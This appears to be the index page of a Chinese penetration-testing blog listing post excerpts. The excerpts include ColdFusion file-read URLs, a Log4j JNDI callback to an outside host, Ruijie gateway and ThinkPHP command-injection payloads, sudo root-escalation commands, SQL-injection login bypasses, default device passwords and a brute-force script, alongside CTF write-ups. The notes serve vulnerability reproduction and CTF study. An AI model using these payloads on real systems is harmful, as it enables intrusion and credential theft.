1stPeak's Blog

原创 coldfusion8后台计划任务拿shell

声明本人所有文章均为技术分享，请勿非法用于其他用途，否则后果自负。

原创 coldfusion文件读取漏洞（CVE-2010-2861）

1、直接访问http//your-ip8500/CFIDE/administrator/enter.cfm?/etc/passwd%00en，即可读取文件/etc/passwd。2、读取后台管理员密码http//your-ip8500/CFIDE/administrator/enter.cfm?/lib/password.properties%00en。AdobeColdFusion8、9版本中存在一处目录穿越漏洞，可导致未授权的用户读取服务器任意文件。解密password。...

原创 致翔OA漏洞复现手册

前言：致翔OA产品漏洞复现笔记，供自己使用，不定期更新声明：本人所有文章均为技术分享，请勿非法用于其他用途，否则后果自负。

原创 华天OA漏洞复现手册

前言：万户OA产品漏洞复现笔记，供自己使用，不定期更新声明：本人所有文章均为技术分享，请勿非法用于其他用途，否则后果自负。漏洞列表：用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞万户OA download_ftp.jsp 任意文件下载漏洞漏洞描述万户OA download_ftp.jsp文件存在任意文件下载漏洞，攻击者通过漏洞可以下载服务器上的任意文件漏洞影响万户OA网络测绘app="万户网络-ezOFFICE"漏洞复现...

原创 用友OA漏洞复现手册

用友OA漏洞复现手册前言：用友OA产品漏洞复现笔记，供自己使用，不定期更新

原创 jQuery-XSS漏洞（CVE-2020-11022/CVE-2020-11023）

jQuery-XSS漏洞（CVE-2020-11022/CVE-2020-11023）

原创 Log4j远程代码执行漏洞验证

环境：poc：${jndi:ldap://baxpur.ceye.io}验证：

原创 任意用户注册&任意用户密码修改

1、任意用户注册漏洞描述：用户手机获取的验证码只有四位数字，可对其进行爆破，使用任意手机号进行注册并登录漏洞验证：2、任意用户密码修改漏洞描述：用户手机获取的验证码只有四位数字，可对其进行爆破，可以对任意手机号进行密码修改漏洞验证：...

原创 慢速HTTP拒绝服务攻击

实战记录：poc：slowhttptest -c 65539 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u URL -p 3

原创 弱口令-20211221

1、找到后台登陆界面2、对界面进行测试由此可以判断账号admin存在经bp爆破，未果。3、根据注册页面信息找到用户名称4、判断该用户名是否存在bp爆破5、登陆成功

原创 根据网站敏感信息猜解账号密码

前言：挖洞时，找到手机号盲猜的账号密码，简单记录一下1、登陆界面2、寻找教师账号3、进行测试账号密码均为手机号

原创 任意密码修改

前言这是做项目时其他人提交的，不难，简单记录一下，毕竟是公网的，测试前提是需要知道账户密码，是其修改密码的界面出现逻辑漏洞导致的1、比如，我们正常访问一个页面2、正常登录此时，我们已经正常登录，那么问题出在哪里呢，问题就在这里的修改密码3、抓包，点击修改密码逻辑问题就在这里，我们只要退出用户，然后直接在登陆界面抓包，修改内容即可未经登录修改账户密码4、通过登陆界面未授权修改账户密码将红框中的内容修改如下，即可绕过，成功修改admin用户密码为123456...

原创 未授权访问漏洞

文章目录1、访问目标URL2、抓包修改返回包信息1、访问目标URL2、抓包修改返回包信息越权访问注：这边抓包改包时间不能过长，否则会出现连接超时声明：该漏洞仅供学习参考，请勿用于非法用途！由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，与本文作者无关。...

原创 Springboot配置不当

未获取密码中危，获取密码高危

原创 RTSP未授权访问

原创 MS12_020漏洞

MS12_020：Microsoft windows远程桌面协议RDP远程代码执行漏洞注：这里不建议使用dos模块，会将目标攻击蓝屏，测试除外msf6 > search ms12_020msf6 > use 1msf6 auxiliary(scanner/rdp/ms12_020_check) > show options msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts IPmsf6 auxiliary(sc

原创 NSCTF-部分题目wp

文章目录Web-xffWeb-sqlWeb-XXECRYPTO-神算子CRYPTO-Catch_the_pointCRYPTO-dataMISC-docxMISC-BBQMISC-xxencode+uuencodeWeb-xff方法一：方法二：Web-sql解题思路：（1）dirsearch扫出备份文件（2）分析文件分析index.php文件：<?php require("conf/config.php"); if (isset($_REQUEST['id']))

原创 短信逻辑漏洞

文章目录示例1示例2示例3注：文章相关法规要求，有些词汇不能显示，真实为短信hz漏洞示例1发送到爆破模块，修改POST请求内容POST /registerform HTTP/1.1Host: www.xxx.com.cnUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: application/json, text/javascript, */*; q=0

原创 CTF-RSA解密脚本

cipher.txt内容：0x1055f45639da0fe7ebb355a6f140425fb2d10b74a61860e60cdadc0d205d4905833a20dac9c2e2a873872f1b5d6ac045c996b9136414b8648b6fc821aea718fd4175324fc254bcaeb2cb2065bcf76d1351b483c2caf87a89ed3a3b0933d82466f6d022b728b85db547596509fb8a2d46ee920d306f5d591

原创 网络安全设备常见弱口令

网上总结一下网络安全设备常见默认口令，方便后续自己查看安全设备默认用户名默认密码深信服sangforsangforsangfor@2018sangfor@2019深信服科技 ADdlanrecover深信服负载均衡 AD 3.6adminadmin深信服WAC ( WNS V2.6)adminadmin深信服VPNAdminAdmin深信服ipsec-VPN (SSL 5.5)AdminAdmin深信服A

原创 登陆界面万能密码绕过

常见万能密码：admin'--admin' or ''=''--admin' or 1=1--'or 1=1--admin'or''=''or'='or''or''='

原创 锐捷EG易网关远程命令执行漏洞-1

测试poc/guest_auth/guestIsUp.php如果没有返回任何信息，且状态码为200，那么很大可能存在远程命令执行payload如下将whoami命令执行结果输出到xxoo.txt文件中POST /guest_auth/guestIsUp.phpmac=1&ip=127.0.0.1|whoami ＞ xxoo.txturl查看写入的文件，获取到目标当前用户和当前目录下的文件payload如下：http://xx.xx.xx.xx/guest_auth/xxo

原创 锐捷弱口令脚本

import requestsdef login(username,password,signname): fopen = open("4430.txt", 'r') lines = fopen.readlines() # print(lines) count = 0 for ip in lines: ip = ip.strip() #print(ip) url = "http://" + ip + ":8081/

原创 锐捷EG易网关与NBR路由器命令执行漏洞-2

锐捷EG易网关与NBR路由器——命令执行漏洞

原创 ThinkPHP5.0.5RCE

访问http://xx.xx.xx.xx:8080/index.php/?s=captchapayload：_method=__construct&filter[]=system&method=GET&get[]=系统命令示例如下：post传入_method=__construct&filter[]=system&method=GET&get[]=whoami进行命令执行post传入_method=__construct&filter

原创 CTFHub-SSRF（全部）

文章目录内网访问伪协议读取文件端口扫描POST请求内网访问解题步骤伪协议读取文件解题步骤端口扫描提示：根据提示对目标端口进行爆破注：使用字典也可以，用for循环写一个字典出来，还有就是爆破时线程不能太高，太高容易失败，无法爆出来POST请求注：中途靶机重启过一次，网址有些改变，不要在意，看payload即可解题步骤根据网上的一些内容，他共有3个php文件，分别是flag.php、302.php、index.phphttp://challenge-d01e92

原创 CTFHub-Web-信息泄露

文章目录目录遍历PHPINFO网站源码bak文件vim缓存.DS_StoreGit泄露-Log（环境有问题）Git泄露-Stash（环境有问题）Git泄露-IndexSVN泄露HG泄露目录遍历解题方法第一种：一个一个点第二种：python脚本import requestsurl = "URL"for i in range(1,5): for j in range(1,5): req = url + "/" + str(i) + "/" + str(j)

原创 CTF加解密/编码常用在线网址

打CTF用到的在线网址，整理出来，可能不全，网上也有很多，这作为我个人用的，后面如果出新，我还在打CTF的话，还会更新。在线翻译有道翻译百度翻译加密解密摩斯密码凯撒密码栅栏密码单个ASCII码转换多个ASCII码转换ROT13解码二进制转字符串与佛论禅Base64培根密码加解密...

原创 CVE-2019-2725复现（从环境搭建到getshell）

前言今天复现CVE-2019-2725时从环境搭建到getshell，这一篇文章是我测试之后总结的一次完整的复现测试流程，供大家参考，如有不足，欢迎指正。漏洞描述Oracle WebLogic Server反序列化漏洞 ，该远程代码执行漏洞无需身份验证即可远程利用，即无需用户名和密码即可通过网络利用。影响版本Oracle WebLogic Server，版本 10.3.6.0、12.1.3.0测试环境准备注：我这里主要介绍linux下weblogic的搭建1、Ubuntu我用的ubuntu

原创 CVE-2020-0796复现（poc+exp）

一、介绍Microsoft服务器消息块3.1.1(SMBv3)协议处理某些请求的方式中存在一个远程代码执行漏洞，也就是"Windows SMBv3客户端/服务器远程代码执行漏洞"。二、影响版本Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows Server, Vers

原创 CVE-2019-14287（sudo提权）

介绍如果sudo配置允许用户通过Runas规范中定义的ALL关键字来以任意用户身份运行命令，那么攻击者有可能通过制定用户ID以root权限执行恶意命令影响版本sudo版本<1.8.28查看sudo版本命令sudo -V复现前提：需要知道普通账号密码以root身份执行命令：sudo -u#-1 id或sudo -u#4294967259 whoami以root身份登录：sudo -u#-1 /bin/bash或sudo -u#4294967259 /bin/bash

原创 Windows10搭建ftp服务

以往笔记，更新一下安装步骤第一步第二步第三步第四步第五步搜索IIS并打开第六步第七步第八步第九步第十步第十一步选择C:\Windows\System32\svchost.exe后点击添加，最后确定即可第十二步...

原创 visual studio报错：error C4996: ‘scanf‘

前言visual studio排错笔记，使用visual运行代码时，出现如下报错：error C4996: ‘scanf’: This function or variable may be unsafe. Consider using scanf_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.中文翻译：这个函数或变量可能不安全。考虑改用scanf_s。要禁用弃用，

原创 XCTF-Web-高手区-shrine

题目解题1、访问目标，发现有一段代码import flaskimport osapp = flask.Flask(__name__)app.config['FLAG'] = os.environ.pop('FLAG')@app.route('/')def index(): return open(__file__).read()@app.route('/shrine/<path:shrine>')def shrine(shrine): de

原创 XCTF-Web-高手区-easytornado

题目解题1、访问url点进去看看2、直接访问/fllllllllllllag文件发现报错了，但我们发现URL中的Error是我们返回的Error，那么我们再来测试一下发现可能存在SSTI漏洞，但被过滤了部分参数，所以不能使用3、这里再回到题目信息easytornado，可以判断出可能是一个python的tornado漏洞因为我没学过python的框架，就不详细解析了，只写payload这里我们要访问/fllllllllllllag文件，并且还要filehash正确，那么我们

原创 XCTF-Web-高手区-supersqli

题目解题1、使用常规的SQL注入操作进行注入，我们测试一下单引号根据返回显示，我们可以判断目标源码中的SQL语句是字符型的，使用单引号闭合我们本地使用mysql测试如下2、使用#、--进行测试发现报错，直接试试编码，将#或--替换为%23或--+3、接下来使用order by判断字段数可以发现，存在两个字段数4、使用union select判断哪个位置的字段可以进行注入发现存在过滤，将我的语句过滤了5、使用堆叠注入（1）查看所有数据库名（2）查看所有表名（3

原创 XCTF-Web-高手区-Web_python_template_injection

题目解题1、题目提示为python模板注入猜测这里是SSTI(Server-Side Template Injection) 服务端模板注入，就是服务器模板中拼接了恶意用户输入导致各种漏洞。通过模板，Web应用可以把输入转换成特定的HTML文件或者email格式2、测试一下http://111.200.241.244:53038/{{1+1}}经过该测试，说明存在SSTI3、那么接下来可以使用相关payload进行验证（1）payload1查看所有模块http://111.200.

原创 XCTF-MISC-新手区-功夫再高也怕菜刀

题目解题步骤1、使用binwalk提取文件2、使用foremost分离文件3、该压缩包解压需要密码4、使用wireshark分析该数据包，搜索flag，找到6666.jpg5、

原创 XCTF-MISC-新手区-base64stego

题目解题思路1、下载附件2、查看附件内容3、直接解压，发现解压失败，存在zip伪加密，那么如何过去stego.txt内容呢（1）方法一：使用010Editor搜索50 4B 01 02 ，把第九位和第十位改为00并保存，即可成功解压出stego.txt（2）方法二：直接在压缩包中打开，然后复制内容解题步骤这是一道base64隐写的题目，这里用网上的py脚本即可1、python2脚本# -*- coding: cp936 -*-b64chars = 'ABCDEFGHIJK

原创 XCTF-MISC-新手区-SimpleRAR

题目解题思路1、将附件解压2、用010Editor打开查看，使用text搜索，发现存在png文件3、将A8 3C 7A中的7A改为744、解压该文件，获得png图片5、将png图片丢入010Editor中发现是gif文件，呢么我们修改一下后缀6、因为提示双图层，我们使用ps或gifsplitter进行分离gifsplitter下载：https://github.com/1stPeak/GIFsplitter2.07、使用StegSolve对两个图片进行查看8、将两个